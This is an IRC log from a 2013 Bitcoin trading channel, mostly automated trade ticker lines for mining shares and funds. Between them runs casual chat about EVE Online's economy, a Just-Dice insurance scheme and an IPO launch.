0.014169 = 0.4676 BTC [+] Jul 12 02:55:04 [BTCTC] [AMC-PT] 18 @ 0.0025 = 0.045 BTC [+] Jul 12 02:55:05 [BTCTC] [DMS.MINING] 15 @ 0.01417 = 0.2126 BTC [+] Jul 12 02:56:02 [BTCTC] [BASIC-MINING] 10 @ 0.390001 = 3.9 BTC [+] Jul 12 02:56:04 [BTCTC] [BASIC-MINING] 2 @ 0.39 = 0.78 BTC [-] Jul 12 02:56:12 [HAVELOCK] [AM100] 10 @ 0.041999 = 0.42 BTC [+] Jul 12 02:56:28 [BTCTC] [DMS.SELLING] 4 @ 0.035 = 0.14 BTC [+] Jul 12 02:58:13 [BTCTC] [B.YABMC] 1 @ 0.0046 BTC [+] Jul 12 02:58:30 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [+] Jul 12 02:59:10 [BTCTC] [ASICMINER-PT] 1 @ 4.382 BTC [+] Jul 12 03:02:16 [BTCTC] [DMS.MINING] 9 @ 0.01417 = 0.1275 BTC [+] Jul 12 03:07:09 [BTCTC] [BITVPS] 3 @ 0.002029 = 0.0061 BTC [+] Jul 12 03:08:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.0425 BTC [-] Jul 12 03:09:56 [BTCTC] [TAT.ASICMINER] 23 @ 0.0425 = 0.9775 BTC [-] Jul 12 03:11:23 [HAVELOCK] [VTX] 1 @ 0.949999 BTC [+] Jul 12 03:13:32 [BTCTC] [DMS.MINING] 2 @ 0.014169 = 0.0283 BTC [-] Jul 12 03:14:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.0422 = 0.0844 BTC [-] Jul 12 03:15:13 [BTCTC] [AMC-PT] 43 @ 0.002499 = 0.1075 BTC [-] Jul 12 03:16:28 [BTCTC] [TAT.ASICMINER] 4 @ 0.043291 = 0.1732 BTC [+] Jul 12 03:18:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.043291 BTC [+] Jul 12 03:21:43 [BTCTC] [AMC-PT] 22 @ 0.002499 = 0.055 BTC [-] Jul 12 03:21:49 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.004226 = 0.0127 BTC [-] Jul 12 03:23:30 [BTCTC] [AMC-PT] 2 @ 0.002499 = 0.005 BTC [-] Jul 12 03:24:18 [MPEX] [S.MPOE] 1050 @ 0.00081259 = 0.8532 BTC [-] Jul 12 03:24:28 [MPEX] [S.MPOE] 4725 @ 0.00081238 = 3.8385 BTC [-] Jul 12 03:25:08 [BTCTC] [DMS.MINING] 10 @ 0.014 = 0.14 BTC [-] Jul 12 03:25:09 [BTCTC] [DMS.MINING] 2 @ 0.014 = 0.028 BTC [-] Jul 12 03:29:57 [BTCTC] [S.MPOE-PT] 3 @ 0.000945 = 0.0028 BTC [+] Jul 12 03:31:49 [BTCTC] [TAT.ASICMINER] 15 @ 0.043291 = 0.6494 BTC [+] Jul 12 03:40:19 [HAVELOCK] [HIM] 1 @ 0.282 BTC [+] Jul 12 03:45:02 [BTCTC] [TAT.ASICMINER] 18 @ 0.043289 = 0.7792 BTC [-] Jul 12 03:45:04 [BTCTC] [BASIC-MINING] 2 @ 0.390001 = 0.78 BTC [+] Jul 12 03:51:14 [BTCTC] [DMS.PURCHASE] 1 @ 0.048759 BTC [-] Jul 12 03:51:17 AMC/ActiveMining dividend 0.00001830/share Jul 12 03:51:30 om nom nom nom xD Jul 12 03:52:06 Bye bye BitBet ? http://www.theverge.com/2013/7/11/4515640/predictious-bitcoin-predictions-market Jul 12 03:55:18 kakobrekla ^ Jul 12 03:55:32 hahahaha ThickAsThieves Jul 12 03:55:39 indeed bye bye Jul 12 03:56:18 mircea_popescu http://www.forbes.com/sites/nathanlewis/2013/07/11/video-game-central-banker-knows-more-than-ben-bernanke-and-bitcoin-dreamers-too/ Jul 12 03:58:58 [HAVELOCK] [AM100] 4 @ 0.042147 = 0.1686 BTC [+] Jul 12 03:59:20 5.1.4 Pixode may require evidence of your identity before processing a withdrawal request. If Pixode requires evidence of your identity and it is not received within a reasonable time Pixode may suspend your account until such proof is received. No withdrawal will be processed until receipt of requested information. Jul 12 03:59:22 lolz Jul 12 03:59:24 glwt Jul 12 03:59:47 heh Jul 12 04:05:21 [HAVELOCK] [AM100] 44 @ 0.041575 = 1.8293 BTC [-] Jul 12 04:07:23 http://bitcoinexaminer.org/marco-santori-bitcoin-is-not-unregulated/ Jul 12 04:07:26 Marco Santori: “Bitcoin is not unregulated” Jul 12 04:07:41 it is here. Jul 12 04:07:54 [BTCTC] [BASIC-MINING] 1 @ 0.41 BTC [+] Jul 12 04:08:20 [BTCTC] [TAT.ASICMINER] 36 @ 0.043283 = 1.5582 BTC [-] Jul 12 04:09:16 [BTCTC] [TAT.ASICMINER] 18 @ 0.043284 = 0.7791 BTC [+] Jul 12 04:09:48 what a shitty interview Jul 12 04:10:16 did they get 3 questions in and just decide to have sex instead? Jul 12 04:11:24 [BTCTC] [S.DICE-PT] 25 @ 0.002383 = 0.0596 BTC [-] Jul 12 04:12:26 [BTCTC] [BASIC-MINING] 2 @ 0.419999 = 0.84 BTC [+] Jul 12 04:13:30 ThickAsThieves ehhh Jul 12 04:14:14 so when will the US start buying dollars? Jul 12 04:15:47 [BTCTC] [ASICMINER-PT] 2 @ 4.394573 = 8.7891 BTC [+] Jul 12 04:16:24 [BTCTC] [DMS.PURCHASE] 2 @ 0.0459 = 0.0918 BTC [-] Jul 12 04:16:26 [BTCTC] [DMS.PURCHASE] 10 @ 0.0459 = 0.459 BTC [-] Jul 12 04:16:53 [BTCTC] [DMS.PURCHASE] 88 @ 0.045576 = 4.0107 BTC [-] Jul 12 04:17:06 [BTCTC] [DMS.SELLING] 16 @ 0.034899 = 0.5584 BTC [-] Jul 12 04:17:40 [BTCTC] [BTC-TRADING-PT] 20 @ 0.8742 = 17.484 BTC [-] Jul 12 04:19:41 [BTCTC] [DMS.MINING] 1 @ 0.014169 BTC [+] Jul 12 04:19:43 [BTCTC] [DMS.MINING] 10 @ 0.014169 = 0.1417 BTC [+] Jul 12 04:19:53 [HAVELOCK] [AM100] 30 @ 0.041575 = 1.2473 BTC [-] Jul 12 04:19:54 [HAVELOCK] [AM100] 96 @ 0.041013 = 3.9372 BTC [-] Jul 12 04:19:55 [HAVELOCK] [AM100] 2 @ 0.041012 = 0.082 BTC [-] Jul 12 04:21:14 [BTCTC] [DMS.MINING] 1 @ 0.0136 BTC [-] Jul 12 04:22:05 [BTCTC] [S.BBET-PT] 135 @ 0.002175 = 0.2936 BTC [+] Jul 12 04:22:22 [BTCTC] [DMS.MINING] 99 @ 0.0136 = 1.3464 BTC [-] Jul 12 04:24:20 [BTCTC] [ASICMINER-PT] 1 @ 4.335 BTC [-] Jul 12 04:24:59 [BTCTC] [ASICMINER-PT] 3 @ 4.331111 = 12.9933 BTC [-] Jul 12 04:26:04 [BTCTC] [BFMINES] 14 @ 0.00385 = 0.0539 BTC [-] Jul 12 04:26:07 [BTCTC] [BFMINES] 296 @ 0.003703 = 1.0961 BTC [-] Jul 12 04:28:56 [BTCTC] [AMC-PT] 473 @ 0.002499 = 1.182 BTC [-] Jul 12 04:28:58 [BTCTC] [AMC-PT] 331 @ 0.0025 = 0.8275 BTC [+] Jul 12 04:30:44 [BTCTC] [DMS.MINING] 100 @ 0.01355 = 1.355 BTC [-] Jul 12 04:30:47 [BTCTC] [DMS.MINING] 1 @ 0.013521 BTC [-] Jul 12 04:30:49 [BTCTC] [DMS.MINING] 3 @ 0.013521 = 0.0406 BTC [-] Jul 12 04:30:52 [BTCTC] [DMS.MINING] 8 @ 0.013521 = 0.1082 BTC [-] Jul 12 04:31:23 "He also has it figured out better than the Bitcoin dreamers. The online world of EVE wouldn’t work very well if the value of the currency was careening all over the place. That’s why they hired the economist to keep the value of the online currency stable, by means of adjustment of supply." Jul 12 04:31:27 this is utter bs. Jul 12 04:31:37 1. the value of the isk is careening all over the place. Jul 12 04:31:58 2. hiring an "economist" is only a solution if you're a journalist looking to be hired as an "economist". otherwise, it does nothing. Jul 12 04:32:43 3. they fixed the isk to the dollar via the plex system (ie, buy game time). this is not something irl goverments can do (the rough equivalent would be they charge for turning on/off the sun) Jul 12 04:33:04 do elaborate on 3 Jul 12 04:33:04 but anyway. Jul 12 04:33:12 please :) Jul 12 04:33:22 benkay costs ~15 bucks to buy 30 months of game time. Jul 12 04:33:34 this can also be construcred as an in-game item, which can be traded to other players. Jul 12 04:34:00 this then somewhat anchors the game currency. Jul 12 04:34:16 but otherwise, their numerous macroeconomic problems are notorious. Jul 12 04:35:00 how does that actually lock isk to dollar? Jul 12 04:35:57 people in the system aren't guaranteed that price for isk out Jul 12 04:36:05 only the operators Jul 12 04:36:41 [BTCTC] [AMC-PT] 500 @ 0.0025 = 1.25 BTC [+] Jul 12 04:37:58 [BTCTC] [TAT.ASICMINER] 20 @ 0.043277 = 0.8655 BTC [-] Jul 12 04:38:49 [BTCTC] [BFMINES] 4 @ 0.003703 = 0.0148 BTC [-] Jul 12 04:38:51 [BTCTC] [BFMINES] 25 @ 0.003701 = 0.0925 BTC [-] Jul 12 04:38:52 [BTCTC] [BFMINES] 80 @ 0.0037 = 0.296 BTC [-] Jul 12 04:38:54 [BTCTC] [BFMINES] 234 @ 0.003603 = 0.8431 BTC [-] Jul 12 04:39:24 yeah but it gives it some marginal utility. Jul 12 04:39:54 [BTCTC] [BFMINES] 1 @ 0.00399 BTC [+] Jul 12 04:42:24 [BTCTC] [DMS.MINING] 59 @ 0.01356 = 0.8 BTC [+] Jul 12 04:42:26 [BTCTC] [DMS.MINING] 218 @ 0.01355 = 2.9539 BTC [-] Jul 12 04:45:04 [BTCTC] [BFMINES] 2 @ 0.00399 = 0.008 BTC [+] Jul 12 04:45:06 [HAVELOCK] [AM100] 10 @ 0.041999 = 0.42 BTC [+] Jul 12 04:45:47 [BTCTC] [DMS.SELLING] 69 @ 0.034899 = 2.408 BTC [-] Jul 12 04:46:01 [BTCTC] [COGNITIVE] 1 @ 0.39 BTC [-] Jul 12 04:47:12 [BTCTC] [TAT.ASICMINER] 1 @ 0.042213 BTC [-] Jul 12 04:47:53 [BTCTC] [COGNITIVE] 1 @ 0.3975 BTC [+] Jul 12 04:48:27 [BTCTC] [ASICMINER-PT] 1 @ 4.389925 BTC [+] Jul 12 04:48:28 [BTCTC] [TAT.VIRTUALMINE] 14 @ 0.003978 = 0.0557 BTC [-] Jul 12 04:48:29 [BTCTC] [TAT.ASICMINER] 4 @ 0.043273 = 0.1731 BTC [+] Jul 12 04:51:20 [BTCTC] [TAT.VIRTUALMINE] 145 @ 0.003978 = 0.5768 BTC [-] Jul 12 04:53:22 [BTCTC] [TAT.VIRTUALMINE] 109 @ 0.003978 = 0.4336 BTC [-] Jul 12 04:53:45 [BTCTC] [DMS.MINING] 8 @ 0.0141 = 0.1128 BTC [+] Jul 12 04:53:47 [BTCTC] [DMS.MINING] 10 @ 0.01419 = 0.1419 BTC [+] Jul 12 04:56:38 someone is shopping btc now :) Jul 12 04:56:59 [BTCTC] [ASICMINER-PT] 1 @ 4.389894 BTC [-] Jul 12 04:57:38 lol thanks "Jose" Jul 12 04:59:30 [BTCTC] [S.DICE-PT] 200 @ 0.002221 = 0.4442 BTC [-] Jul 12 04:59:57 :) Jul 12 05:00:05 funny thing is Jul 12 05:00:13 so many people think it's my real name Jul 12 05:00:18 even Friedcat Jul 12 05:00:28 I felt bad Jul 12 05:00:33 but whatevs Jul 12 05:00:44 [BTCTC] [TAT.ASICMINER] 10 @ 0.043269 = 0.4327 BTC [-] Jul 12 05:01:17 I had one guy reply back signing his email as Mark McGwire Jul 12 05:01:22 So this isnt you? https://encrypted-tbn1.gstatic.com/images?q=tbn:ANd9GcSKFNQPURco4N7VLKeHTtw9hx2zeic38yTR9pTeAv2_XinGH25PTg Jul 12 05:01:46 no this is me: http://blogs.citypages.com/blotter/josecanseco.jpg Jul 12 05:01:59 hahaha nice backfire there Jul 12 05:02:14 this is me and my buddy Mark http://keithmiddlebrookprosports.com/wp-content/uploads/2011/09/mark-mcgwire-jose-canseco-19972.jpg Jul 12 05:02:48 so when are you gonna write your tell-all book about the seedy world of bitcoin share issuers and how y'all juice up and take drugs? Jul 12 05:02:50 this is me in casual attire http://blacksportsonline.com/home/wp-content/uploads/2013/04/black-sports-online-jose-canseco-sex-tape-tim-brando.jpg Jul 12 05:02:57 or wait, we just need to read bitcointalk. Jul 12 05:03:23 I do not use performance-enhancing drugs Jul 12 05:03:30 other than coffee Jul 12 05:03:41 [BTCTC] [DMS.SELLING] 13 @ 0.03425 = 0.4453 BTC [-] Jul 12 05:05:20 lol Jul 12 05:06:04 [BTCTC] [MININGCO.ETF] 7 @ 1.22 = 8.54 BTC [+] Jul 12 05:06:15 [HAVELOCK] [AM100] 28 @ 0.040851 = 1.1438 BTC [-] Jul 12 05:06:32 [HAVELOCK] [AM100] 72 @ 0.040851 = 2.9413 BTC [-] Jul 12 05:09:52 [HAVELOCK] [AM1] 5 @ 4.321 = 21.605 BTC [-] Jul 12 05:10:42 [BTCTC] [B.YABMC] 50 @ 0.0041 = 0.205 BTC [-] Jul 12 05:10:44 [BTCTC] [B.YABMC] 10 @ 0.0041 = 0.041 BTC [-] Jul 12 05:10:46 [BTCTC] [B.YABMC] 176 @ 0.00405 = 0.7128 BTC [-] Jul 12 05:10:48 [BTCTC] [B.YABMC] 10 @ 0.004044 = 0.0404 BTC [-] Jul 12 05:10:50 [BTCTC] [B.YABMC] 6 @ 0.004004 = 0.024 BTC [-] Jul 12 05:10:51 [BTCTC] [B.YABMC] 1 @ 0.00368 BTC [-] Jul 12 05:10:52 [BTCTC] [B.YABMC] 4 @ 0.00215 = 0.0086 BTC [-] Jul 12 05:11:10 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003978 BTC [-] Jul 12 05:11:43 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.003927 = 0.0079 BTC [-] Jul 12 05:11:52 [MPEX] [S.MPOE] 5150 @ 0.0008144 = 4.1942 BTC [+] Jul 12 05:11:55 [MPEX] [S.MPOE] 9354 @ 0.00081376 = 7.6119 BTC [-] Jul 12 05:11:57 [BTCTC] [BASIC-MINING] 2 @ 0.400001 = 0.8 BTC [-] Jul 12 05:11:59 [BTCTC] [BASIC-MINING] 2 @ 0.4 = 0.8 BTC [-] Jul 12 05:12:00 [BTCTC] [BASIC-MINING] 6 @ 0.391001 = 2.346 BTC [-] Jul 12 05:12:02 [BTCTC] [BASIC-MINING] 20 @ 0.391 = 7.82 BTC [-] Jul 12 05:12:17 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003925 = 0.0196 BTC [-] Jul 12 05:13:07 [BTCTC] [ASICMINER-PT] 2 @ 4.33 = 8.66 BTC [-] Jul 12 05:13:11 [BTCTC] [ASICMINER-PT] 1 @ 4.33 BTC [-] Jul 12 05:13:13 [BTCTC] [ASICMINER-PT] 2 @ 4.328 = 8.656 BTC [-] Jul 12 05:13:15 [BTCTC] [ASICMINER-PT] 2 @ 4.3215 = 8.643 BTC [-] Jul 12 05:13:17 [BTCTC] [ASICMINER-PT] 1 @ 4.285 BTC [-] Jul 12 05:13:19 [BTCTC] [ASICMINER-PT] 5 @ 4.28 = 21.4 BTC [-] Jul 12 05:13:21 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [-] Jul 12 05:13:23 [BTCTC] [ASICMINER-PT] 7 @ 4.230005 = 29.61 BTC [-] Jul 12 05:13:25 [BTCTC] [ASICMINER-PT] 2 @ 4.23 = 8.46 BTC [-] Jul 12 05:13:27 [BTCTC] [ASICMINER-PT] 1 @ 4.222202 BTC [-] Jul 12 05:13:29 [BTCTC] [ASICMINER-PT] 4 @ 4.222201 = 16.8888 BTC [-] Jul 12 05:13:38 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003912 BTC [-] Jul 12 05:13:40 [BTCTC] [ASICMINER-PT] 4 @ 4.2012 = 16.8048 BTC [-] Jul 12 05:13:42 [BTCTC] [ASICMINER-PT] 2 @ 4.201105 = 8.4022 BTC [-] Jul 12 05:13:46 [BTCTC] [ASICMINER-PT] 1 @ 4.2011 BTC [-] Jul 12 05:13:48 [BTCTC] [ASICMINER-PT] 1 @ 4.200005 BTC [-] Jul 12 05:13:50 [BTCTC] [ASICMINER-PT] 4 @ 4.200001 = 16.8 BTC [-] Jul 12 05:14:27 [BTCTC] [PAJKA.BOND] 2 @ 0.055389 = 0.1108 BTC [+] Jul 12 05:14:29 [BTCTC] [PAJKA.BOND] 8 @ 0.05539 = 0.4431 BTC [+] Jul 12 05:14:30 [BTCTC] [PAJKA.BOND] 2 @ 0.0555 = 0.111 BTC [+] Jul 12 05:14:32 [BTCTC] [PAJKA.BOND] 4 @ 0.0555 = 0.222 BTC [+] Jul 12 05:14:32 [BTCTC] [PAJKA.BOND] 10 @ 0.06 = 0.6 BTC [+] Jul 12 05:14:34 [BTCTC] [PAJKA.BOND] 102 @ 0.06 = 6.12 BTC [+] Jul 12 05:14:35 [BTCTC] [PAJKA.BOND] 13 @ 0.065 = 0.845 BTC [+] Jul 12 05:14:36 [BTCTC] [PAJKA.BOND] 10 @ 0.0687 = 0.687 BTC [+] Jul 12 05:15:09 [HAVELOCK] [AM1] 1 @ 4.3 BTC [-] Jul 12 05:15:23 [BTCTC] [ASICMINER-PT] 1 @ 4.39 BTC [+] Jul 12 05:18:52 ASICMINER has 4221btc in pre-orders for the new batch of blades, according to these Chinese web sales pages (thus unconfirmed) Jul 12 05:19:33 Unconfirmed pricing is5 Ghash/s mini blade. 9.88 BTC. 35 watt. Jul 12 05:19:34 New 10 Ghash/s blade. 18.88 BTC. 70 watt. Jul 12 05:26:48 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jul 12 05:30:23 [BTCTC] [BTC-TRADING-PT] 3 @ 0.856 = 2.568 BTC [-] Jul 12 05:30:25 [BTCTC] [BTC-TRADING-PT] 16 @ 0.855 = 13.68 BTC [-] Jul 12 05:30:28 [BTCTC] [BTC-TRADING-PT] 3 @ 0.854 = 2.562 BTC [-] Jul 12 05:32:01 It also looks like AM might have added some blades to the farm too Jul 12 05:32:10 http://www.asicminercharts.com/live/ Jul 12 05:32:13 Asicminer Hashrate Charts Jul 12 05:32:56 [BTCTC] [BTC-BOND] 10 @ 0.009996 = 0.1 BTC [+] Jul 12 05:34:15 [BTCTC] [TAT.ASICMINER] 38 @ 0.043197 = 1.6415 BTC [-] Jul 12 05:34:27 [BTCTC] [TAT.ASICMINER] 50 @ 0.043198 = 2.1599 BTC [+] Jul 12 05:34:29 [BTCTC] [TAT.ASICMINER] 12 @ 0.043199 = 0.5184 BTC [+] Jul 12 05:34:31 [BTCTC] [TAT.ASICMINER] 55 @ 0.0432 = 2.376 BTC [+] Jul 12 05:35:07 [BTCTC] [ASICMINER-PT] 3 @ 4.398453 = 13.1954 BTC [+] Jul 12 05:40:40 [BTCTC] [AMC-PT] 600 @ 0.0025 = 1.5 BTC [+] Jul 12 05:41:06 [BTCTC] [ASICMINER-PT] 1 @ 4.210005 BTC [-] Jul 12 05:43:53 [BTCTC] [ASICMINER-PT] 5 @ 4.384942 = 21.9247 BTC [+] Jul 12 05:46:27 [HAVELOCK] [AM1] 1 @ 4.375 BTC [+] Jul 12 05:51:40 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 12 05:58:39 [MPEX] [S.MPOE] 6550 @ 0.00081451 = 5.335 BTC [+] Jul 12 06:00:23 [BTCTC] [AMC-PT] 1365 @ 0.0025 = 3.4125 BTC [+] Jul 12 06:00:59 [HAVELOCK] [AM1] 1 @ 4.395 BTC [+] Jul 12 06:01:19 [HAVELOCK] [AM1] 1 @ 4.444 BTC [+] Jul 12 06:02:18 [BTCTC] [TAT.ASICMINER] 45 @ 0.042233 = 1.9005 BTC [-] Jul 12 06:04:01 [BTCTC] [TAT.ASICMINER] 16 @ 0.042232 = 0.6757 BTC [-] Jul 12 06:05:03 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jul 12 06:06:59 [BTCTC] [AMC-PT] 35 @ 0.0025 = 0.0875 BTC [+] Jul 12 06:08:19 [BTCTC] [ASICMINER-PT] 1 @ 4.23 BTC [-] Jul 12 06:11:19 [BTCTC] [TAT.ASICMINER] 4 @ 0.043196 = 0.1728 BTC [+] Jul 12 06:12:16 [HAVELOCK] [AM100] 50 @ 0.041 = 2.05 BTC [+] Jul 12 06:13:10 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.003998 = 0.024 BTC [+] Jul 12 06:14:57 [BTCTC] [TAT.ASICMINER] 4 @ 0.043194 = 0.1728 BTC [-] Jul 12 06:15:31 [BTCTC] [ASICMINER-PT] 1 @ 4.397999 BTC [+] Jul 12 06:16:21 [MPEX] [S.MPOE] 20000 @ 0.00081451 = 16.2902 BTC [+] Jul 12 06:16:23 [MPEX] [S.MPOE] 13500 @ 0.00081521 = 11.0053 BTC [+] Jul 12 06:16:37 [MPEX] [S.MPOE] 1500 @ 0.00081578 = 1.2237 BTC [+] Jul 12 06:17:53 [HAVELOCK] [AM100] 9 @ 0.041 = 0.369 BTC [+] Jul 12 06:18:09 [HAVELOCK] [VTX] 4 @ 0.830001 = 3.32 BTC [-] Jul 12 06:18:30 [HAVELOCK] [VTX] 1 @ 0.83 BTC [-] Jul 12 06:18:42 [BTCTC] [AMC-PT] 460 @ 0.0025 = 1.15 BTC [+] Jul 12 06:20:30 [BTCTC] [BASIC-MINING] 8 @ 0.419999 = 3.36 BTC [+] Jul 12 06:20:32 [BTCTC] [BASIC-MINING] 6 @ 0.419999 = 2.52 BTC [+] Jul 12 06:20:33 [BTCTC] [ASICMINER-PT] 1 @ 4.24 BTC [-] Jul 12 06:20:34 [BTCTC] [BASIC-MINING] 1 @ 0.429999 BTC [+] Jul 12 06:20:36 [BTCTC] [ASICMINER-PT] 1 @ 4.230006 BTC [-] Jul 12 06:20:37 [BTCTC] [BASIC-MINING] 6 @ 0.439997 = 2.64 BTC [+] Jul 12 06:20:39 [BTCTC] [BASIC-MINING] 5 @ 0.439998 = 2.2 BTC [+] Jul 12 06:20:40 [BTCTC] [BASIC-MINING] 11 @ 0.44 = 4.84 BTC [+] Jul 12 06:21:19 [BTCTC] [COGNITIVE] 15 @ 0.3975 = 5.9625 BTC [+] **** BEGIN LOGGING AT Fri Jul 12 07:34:14 2013 Jul 12 07:34:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.043172 BTC [+] Jul 12 07:34:45 [HAVELOCK] [VTX] 4 @ 0.859999 = 3.44 BTC [+] Jul 12 07:35:13 [HAVELOCK] [VTX] 5 @ 0.86 = 4.3 BTC [+] Jul 12 07:36:04 [HAVELOCK] [AM100] 50 @ 0.04000201 = 2.0001 BTC [-] Jul 12 07:37:18 ;;nethash Jul 12 07:37:19 223056.22826 Jul 12 07:37:23 dang Jul 12 07:37:29 ;;estimate Jul 12 07:37:30 Next difficulty estimate | 33017863.3802 based on data since last change | 31160119.6451 based on data for last three days Jul 12 07:37:46 ;;bcstats Jul 12 07:37:49 Current Blocks: 246164 | Current Difficulty: 2.61628756825699E7 | Next Difficulty At Block: 247967 | Next Difficulty In: 1803 blocks | Next Difficulty In About: 1 week, 2 days, 14 hours, 10 minutes, and 12 seconds | Next Difficulty Estimate: 33017863.3802 | Estimated Percent Change: 26.2012 Jul 12 07:39:54 TradeFortress wants to sell insurance on Just-Dice https://bitcointalk.org/index.php?topic=254723.0;topicseen Jul 12 07:40:06 insurance against what ?! Jul 12 07:40:13 default Jul 12 07:40:41 [HAVELOCK] [AM1] 1 @ 4.395 BTC [-] Jul 12 07:41:49 [HAVELOCK] [AM100] 1 @ 0.04 BTC [-] Jul 12 07:41:51 [HAVELOCK] [AM100] 50 @ 0.039701 = 1.9851 BTC [-] Jul 12 07:41:52 [HAVELOCK] [AM100] 100 @ 0.0395 = 3.95 BTC [-] Jul 12 07:41:53 [HAVELOCK] [AM100] 49 @ 0.0393 = 1.9257 BTC [-] Jul 12 07:42:20 lmao Jul 12 07:42:35 [HAVELOCK] [AM100] 4 @ 0.040003 = 0.16 BTC [+] Jul 12 07:42:41 and i suppose he put 20k btc in escrow somewhere or w/e just dice has Jul 12 07:42:57 [HAVELOCK] [SDICE] 11 @ 0.18230201 = 2.0053 BTC [-] Jul 12 07:43:13 [HAVELOCK] [AM100] 4 @ 0.0393 = 0.1572 BTC [-] Jul 12 07:43:23 more likely 20k in debt owed to him Jul 12 07:44:31 Once the winklevoss bitcoin etf is complete where will I be able to purchase shares? Jul 12 07:44:36 his books must be awesome Jul 12 07:44:50 ThickAsThieves guy's young and ambitious. Jul 12 07:45:03 Evan_ your local shredded paper repository, probably. Jul 12 07:46:04 i wonder if i can use bitcoins to buy the Winkelfund Jul 12 07:48:23 Hopefully. I want in on day one Jul 12 07:49:01 why? Jul 12 07:49:29 TF's fund on BitFunder includes borrowed BTC from CoinLenders Jul 12 07:50:30 [BTCTC] [DMS.PURCHASE] 3 @ 0.048759 = 0.1463 BTC [+] Jul 12 07:52:20 [HAVELOCK] [AM100] 24 @ 0.038703 = 0.9289 BTC [-] Jul 12 07:53:49 I wonder how hard it would be to convert Planeshift into an MMO casino Jul 12 07:54:53 Insuring amounts invested somewhere is stupid. Because people won't pay more than they receive from the investment for insurance, else they'd be better off without investing. Jul 12 07:55:29 Same for insurer, if he get less for insuring a balance invested than investing it directly... the latter option sounds more advantageous. Jul 12 07:55:52 Except with insurance, one can insure many balances with the same capital... Jul 12 07:56:08 Thus investing in multiple businesses for less profit per... Jul 12 07:56:16 But that seems too risky. Jul 12 07:56:48 it's retarded Jul 12 07:57:00 at least with health insurance and most types, Jul 12 07:57:11 only one person comes collecting at a time Jul 12 07:57:19 with JD this is not the case Jul 12 07:57:51 every insured person will want their money all at once Jul 12 07:58:51 it's like selling apocalypse insurance Jul 12 07:59:15 [HAVELOCK] [AM100] 33 @ 0.038801 = 1.2804 BTC [+] Jul 12 07:59:28 I'll take some of that apocalypse insurance. If you pay me to insure me. Jul 12 07:59:32 or cryogenic freezing. Jul 12 07:59:38 [HAVELOCK] [AM100] 7 @ 0.03959999 = 0.2772 BTC [+] Jul 12 07:59:40 [HAVELOCK] [AM100] 93 @ 0.0396 = 3.6828 BTC [+] Jul 12 08:00:08 [HAVELOCK] [SDSTM] 1200 @ 0.001 = 1.2 BTC [-] Jul 12 08:00:10 [HAVELOCK] [SDSTM] 10000 @ 0.001 = 10 BTC [-] Jul 12 08:00:11 [HAVELOCK] [SDSTM] 1000 @ 0.001 = 1 BTC [-] Jul 12 08:00:13 [HAVELOCK] [SDSTM] 3000 @ 0.001 = 3 BTC [-] Jul 12 08:00:14 [HAVELOCK] [SDSTM] 4500 @ 0.001 = 4.5 BTC [-] Jul 12 08:00:39 sigh Jul 12 08:00:42 [HAVELOCK] [SDSTM] 99 @ 0.0108 = 1.0692 BTC [+] Jul 12 08:00:44 [HAVELOCK] [SDSTM] 5 @ 0.01 = 0.05 BTC [-] Jul 12 08:00:45 [HAVELOCK] [SDSTM] 2 @ 0.01 = 0.02 BTC [-] Jul 12 08:00:46 [HAVELOCK] [SDSTM] 5 @ 0.01 = 0.05 BTC [-] Jul 12 08:00:47 [HAVELOCK] [SDSTM] 100 @ 0.01 = 1 BTC [-] Jul 12 08:00:48 [HAVELOCK] [SDSTM] 40 @ 0.01 = 0.4 BTC [-] Jul 12 08:00:54 [HAVELOCK] [SDSTM] 49 @ 0.01 = 0.49 BTC [-] Jul 12 08:01:02 let's IPO at 1am Jul 12 08:01:04 GET THAT FUCKING AUTO-UNLOGGING OFF OF THE DAMN SITE TOPACE Jul 12 08:01:31 ThickAsThieves: S.MPOE ipo'd at like 4 or 5 am CDT Jul 12 08:01:34 It fucking unconnected me at the last refresh Jul 12 08:01:43 yeah but Havelock is EST Jul 12 08:01:47 [HAVELOCK] [SDSTM] 100 @ 0.01 = 1 BTC [-] Jul 12 08:01:57 I could have sold at 0.01 Jul 12 08:02:02 i suspect something else is going on Jul 12 08:02:35 I hate these automatic unlogging Jul 12 08:02:44 i'm indifferent Jul 12 08:02:49 it's lame, Jul 12 08:02:56 but kinda nice security measure Jul 12 08:03:05 [HAVELOCK] [SDSTM] 50 @ 0.0101 = 0.505 BTC [+] Jul 12 08:03:07 [HAVELOCK] [SDSTM] 24 @ 0.01001 = 0.2402 BTC [-] Jul 12 08:03:07 I'm not on a public computer. They keep fucking my shit up. Jul 12 08:03:08 [HAVELOCK] [SDSTM] 1 @ 0.01 BTC [-] Jul 12 08:03:09 [HAVELOCK] [SDSTM] 108 @ 0.01 = 1.08 BTC [-] Jul 12 08:03:19 [HAVELOCK] [SDSTM] 200 @ 0.01 = 2 BTC [-] Jul 12 08:03:21 [HAVELOCK] [SDSTM] 617 @ 0.01 = 6.17 BTC [-] Jul 12 08:03:21 [HAVELOCK] [SDSTM] 51 @ 0.01 = 0.51 BTC [-] Jul 12 08:03:35 [HAVELOCK] [SDSTM] 75 @ 0.02 = 1.5 BTC [+] Jul 12 08:03:47 [HAVELOCK] [SDSTM] 150 @ 0.02 = 3 BTC [+] Jul 12 08:03:51 man i wanted to help topace review this IPO text before releasing Jul 12 08:03:52 [HAVELOCK] [SDSTM] 75 @ 0.02 = 1.5 BTC [+] Jul 12 08:03:53 [HAVELOCK] [SDSTM] 25 @ 0.02 = 0.5 BTC [+] Jul 12 08:04:09 i dont think he intended for it to release right now Jul 12 08:04:10 [HAVELOCK] [SDSTM] 5 @ 0.01999 = 0.1 BTC [-] Jul 12 08:04:14 [HAVELOCK] [SDSTM] 10 @ 0.01999 = 0.1999 BTC [-] Jul 12 08:04:22 [HAVELOCK] [SDSTM] 34 @ 0.01999 = 0.6797 BTC [-] Jul 12 